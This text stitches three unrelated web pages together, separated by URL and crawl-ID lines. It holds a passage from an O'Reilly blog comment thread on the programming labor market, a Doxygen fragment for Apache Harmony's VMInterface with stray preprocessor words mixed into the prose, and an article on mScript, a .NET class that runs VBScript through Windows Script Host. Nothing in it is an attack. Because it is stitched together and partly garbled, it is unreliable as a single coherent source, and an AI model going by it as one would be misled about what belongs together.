is significant in that it occurred at a time when the birth rate fell below the replacement rate), though because they overlap somewhat, you'll actually have two pulses spaced about five years apart with a plateau (and maybe a minor secondary peak) in between them. Thus, things ought to look pretty good for programmers in general for the next five to seven years on demographics alone. Of course, by then, the interesting areas will likely be in bioinformatics and biocybernetics, nanotech derivative efforts in materials science, energy systems, robotics and aerospace, and pure information sciences will look positively primitive in comparison. If I was graduating from college now, I'd not be interested in information technologies, unless it was a minor to some other areas such as biology or space systems. You will still need programmers, of course, but the skilled engineers will be cross discipline, and the business programmer will look positively antiquated, which needs to be taken into account. 1. Note Spolsky's article on hiring programmers that Elliotte pointed out. Note the need for non-programming skills beyond the need for ATL knowledge. English proficiency rates highly. These non-tech skills are becoming another limiting quality but also are a force pushing us to invent new ways to communicate. As the tech lead for a team that includes two non-native English speakers, it makes a difference but not one I can't overcome. 2. Note the articles starting with T. Bray's reference to the DevChix complaints about leering bullying males. Note the comments about declining numbers of women in the business. There are social status forces at work here too.. How far that will go depends a lot on the analysis and design of the classes. I'm fascinated by the ASP 2.0 changes to the framework and where the difficulty shifted.. It turns out I had to find a blog commenting on that because MS never tells one this in a place one can find reasonably quickly. So a software design feature wastes a half day of production because a) it is counter intuitive to experience and b) no one bothered to document it transparently. So even with the componentization, we lose time in complexity of the hidden couplers, technical, social, skills, and competence. Costs are hard to track but it is clearly evident that for the scale of software projects we can deploy, we need fewer workers. Unless of course one is taken over by a distant equity firm that demands absolute control AND cost cutting, thus increasing the numbers of bean counters (Process Design: One Person == One Fact. NeXt), slowing down production and ultimately failing to create value with a company except at the point of resale. Weird but it seems there is no lack of suckers for voodoo economics in the world today (Yes! Matilda Build Virtually And Cash Out Real Before the Pyramid Collapses!). Does the economic picture change? We rely on computers in ways we never have in the past and this sea change is of such recent emergence that we actually don't know what will result based on experience other than as I said, things speed up. Will we develop more efficient communication, more efficient production based on more efficient tools, better social skills or just learn to accept that as the status of being a computer professional drops, some will go elsewhere to find status. If so, then salaries rise and perhaps in social terms go back to being what they were in the 70s relative to today's costs of living. As that happens, the status point shifts and the flow tips back in the other direction. We've seen this before in America. The Space Program cranked out a lot of engineers and practically created the modern software market. Then in 1971, it began to die at an incredible rate. Then it picked up when a combination of technology and economic forces put the money back into the market.> Note the need for non-programming skills beyond the need for ATL knowledge. English proficiency rates highly.</snip> One of the reasons I suspect that the Indian outsource market has outperformed the Chinese ... India has 100+ years of British colonialism to insure that English is still largely a near-native language for their technical workforce. More people worldwide speak Chinese than English, but most of those people are concentrated in China, whereas English is a second language almost everywhere its not a primary one. <snip>Note the comments about declining numbers of women in the business. There are social status forces at work here too.</snip> Absolutely. Programming has long been dominated by young (not terribly well socialized) males, as much for socioeconomic reasons as anything, and young men are notorious in using their work environment to establish their social position (my code's cleaner|more compact|more elegant|whatever than your code). That's a topic for another time, however. <snip.</snip> Yes, though this comes with the danger of biasing the business logic towards the Microsoft way of doing things. Still, t'is a good point. <snip (...) So a software design feature wastes a half day of production because a) it is counter intuitive to experience and b) no one bothered to document it transparently.</snip> Componentization is hard ... even after more than twenty years of doing it myself, I find the process of task decomposition to be a remarkably difficult and treacherous discipline, very much analogous to the designing of good schemas. The irony here is that the process of creating such components is in some respect becoming easier than the process of designing what the components should do in the first place (namespaces!! Aaaargghh!!!) <snip>So even with the componentization, we lose time in complexity of the hidden couplers, technical, social, skills, and competence. Costs are hard to track but it is clearly evident that for the scale of software projects we can deploy, we need fewer workers.</snip> Granted. However, we have fewer workers. The question that I think will shape the software development universe is whether the declining pool of technical competent workers is in fact still larger than the declining pool of programming and IT slots. If the problem is simple economics (software producers are not willing to pay for local talent so long as less expensive remote talent exists) then the solution will be market driven - if the value proposition of the product exceeds the cost of hiring the programmer by some currently unknown factor, then salaries will go up until that is no longer true. If the problem, on the other hand, is fewer trained programmers and a collapsed training pipeline, then production will slow until stasis is reached. <snip>Unless of course one is taken over by a distant equity firm that demands absolute control AND cost cutting, thus increasing the numbers of bean counters.</snip> For every project that has failed because of insufficient software, I'd wager that ten have failed due to building too many layers of bureaucracy, each bureaucrat of whom justified their existence by imposing more and more oversight on software projects. Some oversight is necessary, a great deal of it is highly counterproductive <snip> It's coming soon. The biggest constraint on it happening now is that we require a level of accountability and legibility in our software that computers generally cannot produce (computers are poor at creating abstractions at this stage, which is one of the keys to complexity management). As applications become more complex (thinking in the distributed network realm here) I suspect we're reaching a point where the level of computatonal complexity is so high that we may have no choice but to let computers work at their own level of abstraction and constrain the results, especially in the realm of distributed computing. I'm not sure that will signal the end of programming as a human discipline, but it will certainly alter the balance of power between man and machine in ways that aren't even remotely known. © 2015, O’Reilly Media, Inc. (707) 827-7019 (800) 889-8969 All trademarks and registered trademarks appearing on oreilly.com are the property of their respective owners.
http://archive.oreilly.com/pub/post/the_coming_tech_labor_crunch.html
CC-MAIN-2015-35
en
refinedweb
#include <vmi.h> List of all members. Example usage: Return the JNI JavaVM associated with the VM interface. JavaVM* JNICALL GetJavaVM(VMInterface* vmi); Return a pointer to an initialized HyPortLibrary structure. HyPortLibrary* JNICALL GetPortLibrary(VMInterface* vmi); The port library is a table of functions that implement useful platform specific capability. For example, file and socket manipulation, memory management, etc. It is the responsibility of the VM to create the port library. Return a pointer to a HyVMLSFunctionTable. This is a table of functions for allocating, freeing, getting, and setting thread local storage. ifndef HY_ZIP_API Return a pointer to the HyZipCachePool structure used by the VM. It is the responsibility of the vm to allocate the pool using zipCachePool_new(). else Return a pointer to a JavaVMInitArgs structure as defined by the 1.2 JNI specification. This structure contains the arguments used to invoke the vm. JavaVMInitArgs* JNICALL GetInitArgs(VMInterface* vmi); Genereated on Tue Mar 11 19:25:27 2008 by Doxygen. (c) Copyright 2005, 2008 The Apache Software Foundation or its licensors, as applicable.
http://harmony.apache.org/subcomponents/drlvm/doxygen/intf/html/struct_v_m_interface_functions__.html
CC-MAIN-2015-35
en
refinedweb
null pointer exceptions null pointer exceptions import java.util.*; public class employee { static int ch; static int emp[]; String name; int id,age; float sal; void insert() { employee[] emp=new employee[90]; Scanner r... of modifying null value or obtaing a null value in an arrray. To handle null pointer... helpful in handling null exceptions. Example of NullPointerException: try Null Pointer Exception Null Pointer Exception Null pointer exceptions are the most common run time .... Normally, the latter one is more common. Rule for Debugging Null Pointer null pointer null pointer dear sir , what is mean by null pointer in c Null pointer execption Null pointer execption what is null pointer exception. I am getting the null pointer exception in this line conn= com.mypay.dao.Connection.getConnection(); what is wrong null pointer exception in java null pointer exception in java What is null pointer exception in Java and when it occurs? Show it with an example.Thanks! Java Null Pointer Exception NULL POINTER EXCEPTION NULL POINTER EXCEPTION What is the Root cause for Class caste exception in struts frame work .and how 2 handle that 1 please help me Java null pointer exception Java null pointer exception Hi I've made an array of Book objects that I made, the array is called library and it can hold 100 books, but currently...]!=null){ if(strfield.contains(param)){ result+=library[counter NUll POINTER EXCEPTION NUll POINTER EXCEPTION public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException... of code i m getting null pointer Exception. can some one please explain what null pointer exception in jsp null pointer exception in jsp index.html <html> <body> <table align=center> <form action="Login.jsp" method="get"> <tr> <td colspan=2><h1>Student Login</h1></td>< what is a null pointer exception in java what is a null pointer exception in java what is a null pointer exception in java - Java Beginners Null Pointer Exception How Can I Handle NullPoiniterException without using try/catch mechanism Java Exception - Handle Exceptions in Java . Null Pointer Exception Null pointer... Java Exception - Handle Exceptions in Java... to handle the Exceptions in Java programming language. This section on exception null pointer exception cannot be removed null pointer exception cannot be removed class list { public... Exception nothing; public int r; public list() { this(null,null,0); } public list(String e,int i) { this.elem = e; this.next = null How to solve the Hibernate Common Exceptions? How to solve the Hibernate Common Exceptions? How to solve the Hibernate Common Exceptions Why the null Pointer exception is comming? - Java Beginners Why the null Pointer exception is comming? My code is given below...")); String []oldOne = null; String[]newOne; int i = 0...}; String line; String line1; String[] tokens = null Handle Null Pointer Exception while text file upload Handle Null Pointer Exception while text file upload I want the code for handling null pointer exception in jsp page. That is I need an error page for null pointer exception. The cause for null pointer exception is while when do we get null pointer exception in java when do we get null pointer exception in java can anybody explain me abt null pointer exception? like in wt situation do v get NPE? Are these 2 strings same? String str; String str=null pointer error java pointer error java How to catch null pointer errors in java if the if(value != null) or null pointer pointer CONSTRTUCT A STRUCTURE FOR EMPLOYEE RECORD THAT CONTAINS A PERSON'S NAME, AGE, EMPLOYEE AND SALARY.WRITE A STATEMENT THAT DECLARES A VARIABLE empInfo and a pointer emPtr of type EMPLOYEE.then use the pointer to display exceptions exceptions why we get compiletime exceptions(checkedExeption)? forEg:IOException,servletException Hibernate delete HQL - Hibernate Hibernate delete HQL Hi I am trying hibernate tutorial. But delete HQL tutorial not working properly. It gives null pointer exception. Query class has method executeUpate() & not executeUpdate Please help me fix this code - MobileApplications Please help me fix this code Please help me in this area of code...("", "", Image.createImage("/confirm.jpg"), null); mCfmAlert.setTimeout... = new Alert("Data Saved! \n ", "", null, AlertType.CONFIRMATION hibernate hibernate how to impot mysql database client jar file into eclipse for hibernate configuration Hi Friend, Please visit the following link: Thanks Exceptions - JSP-Servlet java.lang.NumberFormatException: null Even i entered some values for this text box it returns the null exception. Please send me the answer. Thankz check null exception java check null exception java check null exception java - How to check the null exception on Java? The null pointer exception in java occurs... on it. See the example null pointer exception Null pointer exceptation-Java Servlet web application,Problem connecting with MYSQL database Null pointer exceptation-Java Servlet web application,Problem connecting... { private static ConnectionPool pool = null; private static DataSource dataSource = null; private ConnectionPool Catching Normal Exceptions Catching Normal Exceptions The exceptions that are generated by methods are referred to as normal exceptions. We have already learned that to catch an exception how to move pointer in Textfield to newline how to move pointer in Textfield to newline consider my case...); add(l4); add(tf1); add(tf2); add(tf3); setSize(400,600); setLayout(null...); setLayout(null); setVisible(true What are Chained Exceptions? What are Chained Exceptions in Java?  ... provides new functionality for chaining exceptions. Exception chaining (also... exception is caused by the first exception. Therefore chained exceptions help java.lang.IllegalArgumentException: node to traverse cannot be null! java.lang.IllegalArgumentException: node to traverse cannot be null! Can Any body help me out regarding the above exception in Hibernate HQL Catching and Handling Exceptions Java Catching and Handling Exceptions The various keywords for handling exceptions... the exceptions. These are try, catch and finally clause. The mechanism to catch Catching Exceptions in GUI Code - Java Tutorials In this section, we will discuss how to catch uncaught exceptions in GUI. Lets see... at java.awt.EventDispatchThread.run After printing the above exceptions... and attach the dialog to that, instead * of always attaching it to null Hibernate application - Hibernate Hibernate application Hi, Could you please tell me how to implement hibernate application in eclipse3.3.0 Thanks, Kalaga. Hi Friend, Please visit the following link: infix to post fix convertion infix to post fix convertion a+(bc-(d/e^f))*h java.lang.IllegalArgumentException: node to traverse cannot be null! java.lang.IllegalArgumentException: node to traverse cannot be null! In my Hibernate program following error is coming: java.lang.IllegalArgumentException: node to traverse cannot be null Pointer a variable Pointer a variable hii, Pointer is a variable or not ? hello, Yes, a pointer is a variable hibernate web project - Hibernate links: web project hi friends,very good morning,how to develop Problem in running first hibernate program.... - Hibernate /FirstExample Exception in thread "main" " in running first hibernate program.... Hi...I am using... programs.It worked fine.To run a hibernate sample program,I followed the tutorial below hibernate............... hibernate............... goodevining. I am using hibernate on eclipse, while connection to database Orcale10g geting error .........driver ARNING: SQL Error: 0, SQLState: null 31 May, 2012 8:18:01 PM is there is pointer in java or not?? is there is pointer in java or not?? is there is pointer in java or not plz tell me this with brief?? thank you java - Hibernate /hibernate/runninge-xample.shtml Thanks...java HI guys can any one tell me,procedure for executing spring and hibernate in myeclipse ide,plz very urgent for me,thank's in advance.   Hibernate delete a row error - Hibernate Hibernate delete a row error Hello, I been try with the hibernate delete example () but keep receiving exceptions, not sure if I did some thing wrong, please Delete HQL query - Hibernate Delete HQL query Hi I am trying hibernate tutorial. But delete HQL tutorial not working properly. It gives null pointer exception. Query...) at roseindia.tutorial.hibernate.DeleteHQLExample.main(DeleteHQLExample.java:23) null please fix the error please fix the error org.apache.jasper.JasperException: Unable to compile class for JSP: An error occurred at line: 14 in the jsp file: /doctor.jsp Invalid character constant 11: Connection con Hibernate Transaction Hibernate Transaction In this tutorial you will learn about the Transaction in Hibernate. In transaction multiple operations are gathered into a single unit of work. On failure of operation in the batch Hibernate throws exceptions, any Hibernate code - Hibernate Hibernate code firstExample code that you have given for hibernate... inserted in the database from this file. Thanks Hibernate - Hibernate Hibernate SessionFactory Can anyone please give me an example of Hibernate SessionFactory? Hi friend,package roseindia;import...[]){ Session session = null; try { SessionFactory sessionFactory = new pointer to a reference pointer to a reference pointer to a reference in C++ #include <iostream> using namespace std; void foo1(int& x) { int* p = &x; *p = 123; } void foo2(int* x) { int Null Expression Example Null Expression Example In this section, you will see the example of null... is null. You need the following artifacts: Database Table: student Model hibernate - Hibernate hibernate I have written the following program package Hibernate; import org.hibernate.Session; import org.hibernate.*; import... static void main(String[] args) { Session session = null; try{ SessionFactory hibernate - Hibernate Hibernate; import org.hibernate.Session; import org.hibernate.*; import... static void main(String[] args) { Session session = null; try... Hi Radhika, i think, you hibernate configuration Hibernate - Hibernate Hibernate pojo example I need a simple Hibernate Pojo example ...[]){ Session session = null; try{ SessionFactory sessionFactory = new Configuration...){ System.out.println(e.getMessage()); } finally{ } }}hibernate mapping <class name getting null value in action from ajax call getting null value in action from ajax call Getting null value from... help, i am new to struts2 and hibernate. StudentRegistration.jsp <%@ page...;s:if <tr><td><s:select exceptions need to fix errors please help need to fix errors please help it does have 2 errors what should i fix? import java.io.*; class InputName static InputStreamReader reader = new InputStreamReader(system.in); static BufferedReader input = new BufferedReader pagination in hibernate with jsp pagination in hibernate with jsp Hi, plz give me example...;%! public int nullIntconvert(String str){ int num=0; if(str==null) { str="0"; } else if((str.trim()).equals("null")) { str="0"; } else if(str.equals("")) { str Function pointer in c Function pointer in c What is the difference between function call with function pointer and without function pointer(normal function call c-language pointer functions c-language pointer functions what is the execution process of character pointer functions with example how to deal with exceptions in servlet how to deal with exceptions in servlet plz give me the reply Different types of exception handling in Java to null pointer, out of bound array access or also in case if the file... and types of exceptions in Java. There are basically two types of errors , compile... several other methods to handle runtime exceptions. Few examples of Java run time Exceptions in java Exceptions in java Exceptions are used for handing errors and other exceptional events in Java programming language.Exception: Exceptions are abnormal or special conditions exceptions in java - Java Beginners exceptions in java can any one explain exceptions with example... the normal flow of execution of a program. Exceptions are used for signaling...:// Thanks Pointer in java - JSP-Servlet Pointer in java Hello ! All i know that java has no pointer type facility. but i have a problem to related pointer. Actually m using a dll and in that dll there is function that rec add of byte type variables address HIBERNATE COMPOSITE ID - Hibernate HIBERNATE COMPOSITE ID Hi, I have a database table structure as CREATE TABLE `attendance` ( `sno` int(11) NOT NULL auto_increment, `empRef` int(8) default NULL, `dat` date default NULL, `timeIn` time Criteria Queries - Hibernate Hibernate Criteria Queries Can I use the Hibernate Criteria Query features without creating the Hibernate.cfg.xml file? Session session = null... Configuration(); // configuring hibernate SessionFactory JSP handle runtime exceptions JSP handle runtime exceptions How does JSP handle runtime exceptions? Using errorPage attribute of page directive and also we need to specify isErrorPage=true if the current page is intended to URL redirecting java.lang.NumberFormatException: null java.lang.NumberFormatException: null I get org.apache.jasper.JasperException: java.lang.NumberFormatException: null exception when i submit the form plz help me regarding Fix Scrollbar position in a checkboxList after postback Fix Scrollbar position in a checkboxList after postback Hi, I have a CheckBoxList in which have lot of items and i set AutoPostBack="True".I am using Scrollbar on this list.Now when I am checking any item then after postback Exceptions in RMI - RMI Exceptions in RMI During the execution of RMI program, the following exception is raised. Error.. java.rmi.ServerException : ServerRemoteException : nested exception is java.rmi.UnmarshalException : error unmarshalling   hibernate code - Hibernate hibernate code well deepak,Regarding the inputs u asked for my fisr... void main(String[] args) { Session session = null; try{ // This step will read hibernate.cfg.xml and prepare hibernate for use SessionFactory null interface null interface what is the null interface and what is the use of it in real java project ? Hi Friend, A null interface is an interface without any methods.Is also known as Marker interface. Null interfaces are used interfaces,exceptions,threads interfaces,exceptions,threads SIR,IAM JAVA BEGINER,I WANT KNOW THE COMPLETE CONEPTS OF INTERFACES,EXCEPTIONS,THREADS Interface.../interface.shtml Exceptions Exception are such anomalous conditions Advertisements If you enjoyed this post then why not add us on Google+? Add us to your Circles
http://roseindia.net/tutorialhelp/comment/81095
CC-MAIN-2015-35
en
refinedweb
. Part 1 of this article covers three items that involve creating and destroying Java objects This article concerns creating and destroying Java objects: when and how to create them, when and how to avoid creating them, how to ensure they are destroyed in a timely manner, and how to manage any cleanup actions that must precede their destruction.: Elements of Reusable Object-Oriented Software, by Erich Gamma et al. [Gamma, 107]. The static factory method described in this item has no direct equivalent in Design Patterns. is easier to use and the resulting client code easier to read. For example, the constructor BigInteger(int, int, Random), which returns a BigInteger that is probably prime, would have been better expressed as a static factory method named BigInteger.probablePrime. (This really they have names, static factory methods don't share the restriction discussed in the previous paragraph. In cases where a class seems to require multiple constructors with the same signature, replace the constructors with static factory methods and carefully chosen names to highlight their differences. A second advantage of static factory methods is that, unlike constructors, they are not required to create a new object each time they're invoked. This allows immutable classes (Item 15) to use preconstructed instances, or to cache instances as they're constructed, and dispense them repeatedly to avoid creating unnecessary duplicate objects. The Boolean.valueOf(boolean) method illustrates this technique: it never creates an object. This technique is similar to the Flyweight pattern [Gamma95, p. 195]. It can greatly improve performance if equivalent objects are requested often, especially if they are expensive to create. The ability of static factory methods to return the same object from repeated invocations allows classes to maintain strict control over what instances exist at any time. Classes that do this are said to be instance-controlled. There are several reasons to write instance-controlled classes. Instance control allows a class to guarantee that it is a singleton (Item 3) or noninstantiable (Item 4). Also, it allows an immutable class (Item 15) to make the guarantee that no two equal instances exist: a.equals(b) if and only if a==b. If a class makes this guarantee, then its clients can use the == operator instead of the equals(Object) method, which may result in improved performance. Enum types (Item 30) provide this guarantee. A third advantage of static factory methods is that, unlike constructors, they can return an object of any subtype of their return type. This gives you great flexibility in choosing the class of the returned object. One application of this flexibility is that an API can return objects without making their classes public. Hiding implementation classes in this fashion leads to a very compact API. This technique lends itself to interface-based frameworks (Item 18), where interfaces provide natural return types for static factory methods. Interfaces can't have static methods, so by convention, static factory methods for an interface named Type are put in a noninstantiable class (Item 4) named Types. For example, the Java Collections Framework has 32 convenience implementations of its collection interfaces, providing unmodifiable collections, synchronized collections, and the like. Nearly all of these implementations are exported via static factory methods in one noninstantiable class ( java.util.Collections). The classes of the returned objects are all nonpublic. The Collections Framework API is much smaller than it would have been had it exported 32 separate public classes, one for each convenience implementation. It is not just the bulk of the API that is reduced, but the conceptual weight. The user knows that the returned object has precisely the API specified by its interface, so there is no need to read additional class documentation for the implementation classes. Furthermore, using such a static factory method requires the client to refer to the returned object by its interface rather than its implementation class, which is generally good practice (Item 52). Not only can the class of an object returned by a public static factory method be nonpublic, but the class can vary from invocation to invocation depending on the values of the parameters to the static factory. Any class that is a subtype of the declared return type is permissible. The class of the returned object can also vary from release to release for enhanced software maintainability and performance. The class java.util.EnumSet (Item 32), introduced in release 1.5, has no public constructors, only static factories. They return one of two implementations, depending on the size of the underlying enum type: if it has 64 or fewer elements, as most enum types do, the static factories return a RegularEnumSet instance, which is backed by a single long; if the enum type has 65 or more elements, the factories return a JumboEnumSet instance, backed by a long array. The existence of these two implementation classes is invisible to clients. If RegularEnumSet ceased to offer performance advantages for small enum types, it could be eliminated from a future release with no ill effects. Similarly, a future release could add a third or fourth implementation of EnumSet if it proved beneficial for performance. Clients neither know nor care about the class of the object they get back from the factory; they care only that it is some subclass of EnumSet. The class of the object returned by a static factory method need not even exist at the time the class containing the method is written. Such flexible static factory methods form the basis of service provider frameworks, such as the Java Database Connectivity API (JDBC). A service provider framework is a system in which multiple service providers implement a service, and the system makes the implementations available to its clients, decoupling them from the implementations. There are three essential components of a service provider framework: a service interface, which providers implement; a provider registration API, which the system uses to register implementations, giving clients access to them; and a service access API, which clients use to obtain an instance of the service. The service access API typically allows but does not require the client to specify some criteria for choosing a provider. In the absence of such a specification, the API returns an instance of a default implementation. The service access API is the "flexible static factory" that forms the basis of the service provider framework. An optional fourth component of a service provider framework is a service provider interface, which providers implement to create instances of their service implementation. In the absence of a service provider interface, implementations are registered by class name and instantiated reflectively (Item 53). In the case of JDBC, Connection plays the part of the service interface, DriverManager.registerDriver is the provider registration API, DriverManager.getConnection is the service access API, and Driver is the service provider interface. There are numerous variants of the service provider framework pattern. For example, the service access API can return a richer service interface than the one required of the provider, using the Adapter pattern [Gamma95, p. 139]. Here is a simple implementation with a service provider interface and a default provider: // Service provider framework sketch // Service interface public interface Service { ... // Service-specific methods go here } // Service provider interface public interface Provider { Service newService(); } // Noninstantiable class for service registration and access public class Services { private Services() { } // Prevents instantiation (Item 4) // Maps service names to services private static final Map<String, Provider> providers = new ConcurrentHashMap<String, Provider>(); public static final String DEFAULT_PROVIDER_NAME = "<def>"; // Provider registration API public static void registerDefaultProvider(Provider p) { registerProvider(DEFAULT_PROVIDER_NAME, p); } public static void registerProvider(String name, Provider p){ providers.put(name, p); } // Service access API public static Service newInstance() { return newInstance(DEFAULT_PROVIDER_NAME); } public static Service newInstance(String name) { Provider p = providers.get(name); if (p == null) throw new IllegalArgumentException( "No provider registered with name: " + name); return p.newService(); } } A fourth advantage of static factory methods is that they reduce the verbosity of creating parameterized type instances. Unfortunately, you must specify the type parameters when you invoke the constructor of a parameterized class even if they're obvious from context. This typically requires you to provide the type parameters twice in quick succession: Map<String, List<String>> m = new HashMap<String, List<String>>(); This redundant specification quickly becomes painful as the length and complexity of the type parameters increase. With static factories, however, the compiler can figure out the type parameters for you. This is known as type inference. For example, suppose that HashMap provided this static factory: public static <K, V> HashMap<K, V> newInstance() { return new HashMap<K, V>(); } Then you could replace the wordy declaration above with this succinct alternative: Map<String, List<String>> m = HashMap.newInstance(); Someday the language may perform this sort of type inference on constructor invocations as well as method invocations, but as of release 1.6, it does not. Unfortunately, the standard collection implementations such as HashMap do not have factory methods as of release 1.6, but you can put these methods in your own utility class. More importantly, you can provide such static factories in your own parameterized classes. The main disadvantage of providing only static factory methods is that classes without public or protected constructors cannot be subclassed. The same is true for nonpublic classes returned by public static factories. For example, it is impossible to subclass any of the convenience implementation classes in the Collections Framework. Arguably this can be a blessing in disguise, as it encourages programmers to use composition instead of inheritance (Item 16). A second disadvantage of static factory methods is that they are not readily distinguishable from other static methods. They do not stand out in API documentation in the way that constructors do, so it can be difficult to figure out how to instantiate a class that provides static factory methods instead of constructors. The Javadoc tool may someday draw attention to static factory methods. In the meantime, you can reduce this disadvantage by drawing attention to static factories in class or interface comments, and by adhering to common naming conventions. Here are some common names for static factory methods: valueOf-- Returns an instance that has, loosely speaking, the same value as its parameters. Such static factories are effectively type-conversion methods. of-- A concise alternative to valueOf, popularized by EnumSet(Item 32). getInstance-- Returns an instance that is described by the parameters but cannot be said to have the same value. In the case of a singleton, getInstancetakes no parameters and returns the sole instance. newInstance-- Like getInstance, except that newInstanceguarantees that each instance returned is distinct from all others. getType-- Like getInstance, but used when the factory method is in a different class. Type indicates the type of object returned by the factory method. newType-- Like newInstance, but used when the factory method is in a different class. Type indicates the type of object returned by the factory method. In summary, static factory methods and public constructors both have their uses, and it pays to understand their relative merits. Often static factories are preferable, so avoid the reflex to provide public constructors without first considering static factories.
http://www.drdobbs.com/architecture-and-design/creating-and-destroying-java-objects-par/208403883?pgno=1
CC-MAIN-2015-35
en
refinedweb
#include <pthread.h> int pthread_cond_broadcast(pthread_cond_t *cond); int pthread_cond_signal(pthread_cond_t *cond); These functions shall unblock threads blocked on a condition variable. The pthread_cond_broadcast() function shall unblock all threads currently blocked on the specified condition variable cond. The pthread_cond_signal() function shall unblock at least one of the threads that are blocked on the specified condition variable cond (if any threads are blocked on cond). If more than one thread is blocked on a condition variable, the scheduling policy shall determine the order in which threads are unblocked. When each thread unblocked as a result of a pthread_cond_broadcast() or pthread_cond_signal() returns from its call to pthread_cond_wait() or pthread_cond_timedwait(), the thread shall own the mutex with which it called pthread_cond_wait() or pthread_cond_timedwait(). The thread(s) that are unblocked shall contend for the mutex according to the scheduling policy (if applicable), and as if each had called pthread_mutex_lock(). The pthread_cond_broadcast() or pthread_cond_signal() functions may be called by a thread whether or not it currently owns the mutex that threads calling pthread_cond_wait() or pthread_cond_timedwait() have associated with the condition variable during their waits; however, if predictable scheduling behavior is required, then that mutex shall be locked by the thread calling pthread_cond_broadcast() or pthread_cond_signal(). The pthread_cond_broadcast() and pthread_cond_signal() functions shall have no effect if there are no threads currently blocked on cond.() makes it easier to implement a read-write lock. The pthread_cond_broadcast() function is needed in order to wake up all waiting readers when a writer releases its lock. Finally, the two-phase commit algorithm can use this broadcast function to notify all clients of an impending transaction commit. It is not safe to use the pthread_cond_signal() function in a signal handler that is invoked asynchronously. Even if it were safe, there would still be a race between the test of the Boolean pthread_cond_wait() that could not be efficiently eliminated. Mutexes and condition variables are thus not suitable for releasing a waiting thread by signaling from code running in a signal handler. On a multi-processor, it may be impossible for an implementation of pthread_cond_signal() to avoid the unblocking of more than one thread blocked on a condition variable. For example, consider the following partial implementation of pthread_cond_wait() and pthread_cond_signal(), executed by two threads in the order given. One thread is trying to wait on the condition variable, another is concurrently executing pthread_cond_signal(), while a third thread is already waiting. pthread_cond_wait(mutex, cond): value = cond->value; /* 1 */ pthread_mutex_unlock(mutex); /* 2 */ pthread_mutex_lock(cond->mutex); /* 10 */ if (value == cond->value) { /* 11 */ me->next_cond = cond->waiter; cond->waiter = me; pthread_mutex_unlock(cond->mutex); unable_to_run(me); } else pthread_mutex_unlock(cond->mutex); /* 12 */ pthread_mutex_lock(mutex); /* 13 */ pthread_cond_signal(cond): pthread_mutex_lock(cond->mutex); /* 3 */ cond->value++; /* 4 */ if (cond->waiter) { /* 5 */ sleeper = cond->waiter; /* 6 */ cond->waiter = sleeper->next_cond; /* 7 */ able_to_run(sleeper); /* 8 */ } pthread_mutex_unlock(cond->mutex); /* 9 */>
http://www.makelinux.net/man/3posix/P/pthread_cond_broadcast
CC-MAIN-2015-35
en
refinedweb
an Excel file directly from https URL Is it possible to import an Excel file directly into Stata from a secure (https) URL? Per , the following routine works perfectly for the first, unsecure URL, but the second -copy- gives an "unknown network protocol" (r671) error: tempfile raw copy "http://[URL]" `raw' import excel `raw' copy "https://[URL]" `raw', replace import excel `raw' Many thanks for any assistance. * * For searches and help try: * * *
http://www.stata.com/statalist/archive/2013-04/msg01193.html
CC-MAIN-2015-35
en
refinedweb
Tk_ClipboardClear, Tk_ClipboardAppend - Manage the clipboard #include <tk.h> int Tk_ClipboardClear(interp, tkwin) int Tk_ClipboardAppend(interp, tkwin, target, format, buffer) Interpreter to use for reporting errors. Window that determines which display's clipboard to manipulate. Conversion type for this clipboard item; has same meaning as target argument to Tk_CreateSelHandler. Representation to use when data is retrieved; has same meaning as format argument to Tk_CreateSelHandler. Null terminated string containing the data to be appended to the clipboard. Callbacks, as a result of losing the CLIPBOARD selection, so any calling function should take care to be reentrant at the point Tk_ClipboardClear is invoked. append, clipboard, clear, format, type
http://search.cpan.org/~ni-s/Tk-804.027/pod/pTk/Clipboard.pod
CC-MAIN-2015-35
en
refinedweb
mScript is a .NET class that allows you to dynamically script portions of your code using VBScript. You can pass multiple variables to your script, do any necessary processing, and return multiple variables from the script. mScript After adding a reference to the mScriptable.dll assembly, you can use/import the namespace: using mScriptable; You can then begin by creating an instance of the mScript class found in the mScriptable namespace. mScriptable mScript script = new mScript() Next, you need to supply the variables your script will need access to. script.addScriptInput("foo", "Hello"); script.addScriptInput("bar", "World"); script.addScriptInput("x", 100); script.addScriptInput("y", 13); And also assign your script code to the script object. script string myScriptCode = "..."; script.setScript(myScriptCode); Your script code must be valid VBScript. Any error in the script will be caught by the Windows Scripting Host and not the control. Currently, the return value from the Windows Scripting Host process is not being monitored to determine if a script completed successfully, so it's important to catch your own errors. Your VBScript can retrieve the values supplied to it using either a provided inpVal(varName) function, or an abbreviated wrapper function iv(varName). Values can be returned to the .NET caller using a provided return varName, varVal subroutine. A sample script might look like the following: inpVal(varName) iv(varName) return varName, varVal You can execute your script code using the runScript() method of the mScript object. This method will return a Hashtable containing all of your script's return values. runScript() Hashtable Hashtable rValues = script.runScript(); Upon completion of the script, the runScript() method will return a Hashtable containing the script's return values. In the case of our example, your Hashtable would have the following: hwString calc1 calc2 Back in your .NET application, you can then retrieve these values using the Hashtable. string returned = ""; foreach (string rVar in rValues.Keys) { returned += rVar + " = " + rValues[rVar] + "\r\n"; } MessageBox.Show(returned); That's pretty much all there is to it. The supplied demo project shows a working example of the class in use, allowing you to supply the inputs, modify the VBScript, execute, and then view the outputs. mScriptable relies on the Windows Scripting Host for its VBScript functionality. As such, with each call to runScript(), you incur the overhead of starting a Windows Scripting Host process. The communication between the .NET component and the scripting host is fairly crude, but workable. For each run, a new file (called [timestamp].vbs) is created. This file includes your provided code as well as some header code that provides the basic variable value retrieval and value return functionality as well as file I/O. Each call your script makes to the return subroutine spools a tab delimited name/value pair out to another file called [timestamp].txt. When the script exits, the .NET module reads the values from this file and makes them available in a Hashtable. After the script completes and the values are retrieved, both the .vbs and .txt files are removed. return At user request, mScriptable has been modified so it can now run a user's standalone scripts. If you want to use a VBScript directly with WSH and also via a .NET application using mScriptable, you now can. The changes you'll need to make to your script are as follows: inpVal() iv() return() To prevent duplicate declarations of functions/subroutines in the VBScript code, mScriptable will remove any user defined functions/subroutines named inpVal(), iv(), or return(). A sample VBScript that can run standalone as well as via mScriptable might look like the following: ' My function to allow script to run via WSH directly Function iv(myVariable) Dim retVal Select Case myVariable Case "foo" retVal = "John" Case "bar" retVal = "Doe" Case "x" retVal = 9 Case "y" retVal = 3 Case Else retVal = "" End Select iv = retVal End Function Sub return(varName, varVal) ' this is just a dummy function MsgBox varName & " = " & varVal End Sub When executed via the WSH directly, this script would run as you would expect. When loaded and run via mScriptable, the iv() function and the return() subroutine will be removed and replaced with mScriptable's own code that supplies the script inputs..
